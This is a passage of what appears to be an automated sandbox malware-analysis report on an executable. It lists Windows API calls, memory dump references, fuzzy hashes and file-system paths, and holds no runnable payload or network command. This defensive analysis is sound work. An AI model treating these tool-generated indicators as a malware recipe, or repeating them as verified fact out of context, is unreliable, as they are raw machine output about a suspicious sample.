                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 597d59fe883301d0b5c6155ff6ef4d2bcc35d12bd0c13962cde650b33604b6df
                                                                                                    • Instruction ID: da82fd3536d89c96f0dffd23ebfb530c9c189a59b1cea2a2009ac9f088f6e34b
                                                                                                    • Opcode Fuzzy Hash: 597d59fe883301d0b5c6155ff6ef4d2bcc35d12bd0c13962cde650b33604b6df
                                                                                                    • Instruction Fuzzy Hash: E4A00176444A40AFCA02AF50EF09D0ABB62ABA4701B12897AE295900348B765872EB19
                                                                                                    APIs
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,759223A0), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                      • Part of subcall function 00405773: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
                                                                                                      • Part of subcall function 00405773: CloseHandle.KERNEL32(?), ref: 004057A9
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FC0
                                                                                                      • Part of subcall function 00406552: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F76,?,?,?,?,?,?), ref: 00406563
                                                                                                      • Part of subcall function 00406552: GetExitCodeProcess.KERNEL32(?,?), ref: 00406585
                                                                                                      • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 2972824698-0
                                                                                                    • Opcode ID: b5715756e82aacef9dba35480b317cef67fa4a28b9ebd8b0c2191e4f0fbd53e2
                                                                                                    • Instruction ID: 38ff014a8e4085178bb50f003d2faa90d0cc15d8516b8928bc727fcbc0eca729
                                                                                                    • Opcode Fuzzy Hash: b5715756e82aacef9dba35480b317cef67fa4a28b9ebd8b0c2191e4f0fbd53e2
                                                                                                    • Instruction Fuzzy Hash: 20F0B432905021EBCB20BFA59D84AEFB2A5DF01319B24463FF102B61D1CB7C4E425A6E
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00403644,?,?,00000007,00000009,0000000B), ref: 00403818
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 203254b4b952498bcfb426d07e946647441d2fe85a9017f9f34946e1d1af236a
                                                                                                    • Instruction ID: 70899941626206ae6593ea46f51f68263bc92dff29c150bed4396ff8d4ee1535
                                                                                                    • Opcode Fuzzy Hash: 203254b4b952498bcfb426d07e946647441d2fe85a9017f9f34946e1d1af236a
                                                                                                    • Instruction Fuzzy Hash: 12C0123154070496C120BF749D4F5193B94AB45335B94877DB0F5B00F0CB7C4A6A465A
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404639
                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 00404663
                                                                                                    • SHBrowseForFolderA.SHELL32(?,0079E940,?), ref: 00404714
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0040471F
                                                                                                    • lstrcmpiA.KERNEL32(: Completed,0079F568), ref: 00404751
                                                                                                    • lstrcatA.KERNEL32(?,: Completed), ref: 0040475D
                                                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040476F
                                                                                                      • Part of subcall function 004057D4: GetDlgItemTextA.USER32(?,?,00000400,004047A6), ref: 004057E7
                                                                                                      • Part of subcall function 004063AF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
                                                                                                      • Part of subcall function 004063AF: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
                                                                                                      • Part of subcall function 004063AF: CharNextA.USER32(?,"C:\Users\user\Desktop\dP5z8RpEyQ.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
                                                                                                      • Part of subcall function 004063AF: CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0079E538,?,?,0000040F,?,0079E538,0079E538,?,00000001,0079E538,?,?,000003FB,?), ref: 0040482D
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404848
                                                                                                      • Part of subcall function 004049A1: lstrlenA.KERNEL32(0079F568,0079F568,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048BC,000000DF,00000000,00000400,?), ref: 00404A3F
                                                                                                      • Part of subcall function 004049A1: wsprintfA.USER32 ref: 00404A47
                                                                                                      • Part of subcall function 004049A1: SetDlgItemTextA.USER32(?,0079F568), ref: 00404A5A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                    • String ID: 8y$: Completed$A$C:\Users\user\AppData\Roaming\skittaget\lektier$Haste.n$
                                                                                                    • API String ID: 2624150263-3862961308
                                                                                                    • Opcode ID: a4aefe8a33941754a38210bdfdb67fad9402d671bf1433dcbf252a6a4ee896ac
                                                                                                    • Instruction ID: 0969ed353920fe7c0c653b0854d10b45f8508fdea16f9d8b9f06e94c3a270cc6
                                                                                                    • Opcode Fuzzy Hash: a4aefe8a33941754a38210bdfdb67fad9402d671bf1433dcbf252a6a4ee896ac
                                                                                                    • Instruction Fuzzy Hash: 80A17FB1900208ABDB11EFA5CD85AAF77B8EF85314F14843BF701B62D1D77C8A518B69
                                                                                                    APIs
                                                                                                    • DeleteFileA.KERNEL32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058C5
                                                                                                    • lstrcatA.KERNEL32(007A0570,\*.*,007A0570,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040590D
                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,007A0570,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040592E
                                                                                                    • lstrlenA.KERNEL32(?,?,0040A014,?,007A0570,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405934
                                                                                                    • FindFirstFileA.KERNEL32(007A0570,?,?,?,0040A014,?,007A0570,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405945
                                                                                                    • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059F2
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00405A03
                                                                                                    Strings
                                                                                                    • "C:\Users\user\Desktop\dP5z8RpEyQ.exe", xrefs: 0040589C
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004058A9
                                                                                                    • \*.*, xrefs: 00405907
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                    • API String ID: 2035342205-595587087
                                                                                                    • Opcode ID: 9393b2adcb6d8846d5ff8c884456c1fb2c6b7946f01c0648e6f841e18f88bca0
                                                                                                    • Instruction ID: ff286dc4e0ddd5c67b21a0dc49aadedac0e09a5b28e8edd6ac2018649726c89b
                                                                                                    • Opcode Fuzzy Hash: 9393b2adcb6d8846d5ff8c884456c1fb2c6b7946f01c0648e6f841e18f88bca0
                                                                                                    • Instruction Fuzzy Hash: 9C51B071900A04AADF21AB65CC86BBF7B68DF46724F14823BF441B51D2C73C4A82DF69
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution, xrefs: 00402230
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                                    • String ID: C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution
                                                                                                    • API String ID: 123533781-1527842708
                                                                                                    • Opcode ID: cc6f848e1b62abadab8e006f4452da0e78099bc8968069d3cce75adc38b3ee25
                                                                                                    • Instruction ID: 66478de832771c1020eecb70c9dea3013e0956f30c68bb444eb5f27a96bb8e2b
                                                                                                    • Opcode Fuzzy Hash: cc6f848e1b62abadab8e006f4452da0e78099bc8968069d3cce75adc38b3ee25
                                                                                                    • Instruction Fuzzy Hash: DC511671A00208AFCB00DFE4C988E9D7BB6FF48314F2041BAF515EB2D1DA799981CB14
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: 7f756400988a11a576d96bcb330f7db73c3d2f4761ae35ba5f018229d3e87ddf
                                                                                                    • Instruction ID: 501d16c749f80da14ed264ffe4d7962c3458ff385ba500142fb475b890c78c7d
                                                                                                    • Opcode Fuzzy Hash: 7f756400988a11a576d96bcb330f7db73c3d2f4761ae35ba5f018229d3e87ddf
                                                                                                    • Instruction Fuzzy Hash: E5F0A771644110DED700EB649A49AEE77689F51314F20457BF102B20C1D6B84A46972A
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B74
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B81
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404BD0
                                                                                                    • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404BE7
                                                                                                    • SetWindowLongA.USER32(?,000000FC,0040516F), ref: 00404C01
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C13
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C27
                                                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 00404C3D
                                                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C49
                                                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C59
                                                                                                    • DeleteObject.GDI32(00000110), ref: 00404C5E
                                                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404C89
                                                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404C95
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D2F
                                                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D5F
                                                                                                      • Part of subcall function 0040418D: SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D73
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 00404DA1
                                                                                                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DAF
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404DBF
                                                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EBA
                                                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F1F
                                                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F34
                                                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F58
                                                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F78
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F8D
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404F9D
                                                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405016
                                                                                                    • SendMessageA.USER32(?,00001102,?,?), ref: 004050BF
                                                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050CE
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050F8
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405146
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00405151
                                                                                                    • ShowWindow.USER32(00000000), ref: 00405158
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $M$N
                                                                                                    • API String ID: 2564846305-813528018
                                                                                                    • Opcode ID: 90a3f73bba2d9c8e7cacb4b794b53442a440f171c96f1b4cbc8b508420429673
                                                                                                    • Instruction ID: 01e3f0ac69fe039d53c66122a0ee2819e5ae0f579c243cd3ce02c20529578500
                                                                                                    • Opcode Fuzzy Hash: 90a3f73bba2d9c8e7cacb4b794b53442a440f171c96f1b4cbc8b508420429673
                                                                                                    • Instruction Fuzzy Hash: AC025BB0900209AFDB10DFA8DD45AAE7BB5FB84354F10813AF610BA2E1D7799D52CF58
                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040434E
                                                                                                    • GetDlgItem.USER32(00000000,000003E8), ref: 00404362
                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404380
                                                                                                    • GetSysColor.USER32(?), ref: 00404391
                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043A0
                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043AF
                                                                                                    • lstrlenA.KERNEL32(?), ref: 004043B2
                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043C1
                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043D6
                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404438
                                                                                                    • SendMessageA.USER32(00000000), ref: 0040443B
                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044A6
                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 004044B5
                                                                                                    • SetCursor.USER32(00000000), ref: 004044BE
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004044D4
                                                                                                    • SetCursor.USER32(00000000), ref: 004044D7
                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404503
                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404517
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
